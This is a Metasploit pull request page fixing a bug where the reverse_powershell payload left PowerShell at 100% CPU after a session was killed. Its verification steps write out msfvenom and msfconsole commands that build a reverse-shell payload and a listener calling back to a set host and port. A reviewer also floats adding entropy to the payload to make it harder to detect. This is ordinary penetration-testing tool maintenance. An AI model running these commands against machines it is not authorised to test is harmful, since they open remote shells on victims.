
Fix psh template to avoid 100% cpu spike on CTRL+C #7522

Merged
merged 2 commits into from
Nov 2, 2016

Conversation

@OJ (Contributor) commented Nov 1, 2016

As mentioned in #7293, using the reverse_powershell payload and exiting the shell without typing exit (e.g., by pressing CTRL+C and terminating the shell, or killing it via sessions -[K|k]) would result in the PowerShell process burning the CPU to 100%.

This PR includes a tweak to the PowerShell payload that makes this problem go away.

Verification

  • Create a payload: $ msfvenom -p cmd/windows/reverse_powershell LHOST=172.16.255.1 LPORT=8000 -f raw -o ~/scratch/met/ps-cmd.bat
  • Create a matching listener: $ msfconsole -q -x 'use exploit/multi/handler; set payload cmd/windows/reverse_powershell; set LHOST 172.16.255.1; set LPORT 8000; set ExitOnSession false; run -j'
  • Run the payload bat file on a Windows target that has PowerShell installed.
  • Confirm a working session appears.
  • Interact with the session, run commands, then type exit.
  • Verify that the PowerShell process terminates completely.
  • Run the payload bat file again.
  • Confirm a working session appears.
  • Run sessions -K to kill the session without interacting with it (or interact, press CTRL+C and terminate).
  • Verify that the PowerShell process terminates completely.

Fixes #7293.

@bwatters-r7 (Contributor) commented:

@OJ did you rerun the cached value size script for payloads?

@OJ (Contributor, Author) commented Nov 2, 2016

This is a great question that highlights how stupid I am! :) Thanks @bwatters-r7, doing it now.

@bwatters-r7 bwatters-r7 self-assigned this Nov 2, 2016
@sempervictus (Contributor) commented:

I haven't looked too deeply into these command payloads, but I just realized this is raw PSH with none of the entropy-generating permutations Rex::Powershell provides. Are these payloads widely used? If so, is there any interest in converting them to Rex::Powershell::Script objects in generation, and for the execution call via the PSH commandline pieces?

@OJ (Contributor, Author) commented Nov 2, 2016

I don't think they're used that often. If the lack of entropy becomes an issue we can throw in a bunch of updates.

Thanks for reviewing @sempervictus.

@bwatters-r7 bwatters-r7 merged commit 7895ba8 into rapid7:master Nov 2, 2016
@bwatters-r7 (Contributor) commented Nov 2, 2016

Release Notes

This fix addresses a bug in the PowerShell payload where it spiked a core on the remote CPU after termination through a standard 'ctrl-c'.

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Nov 28, 2016
@OJ OJ deleted the fix-ps-cmd-cpu-spike branch June 16, 2017 06:46
Labels: bug, payload, rn-fix (release notes fix)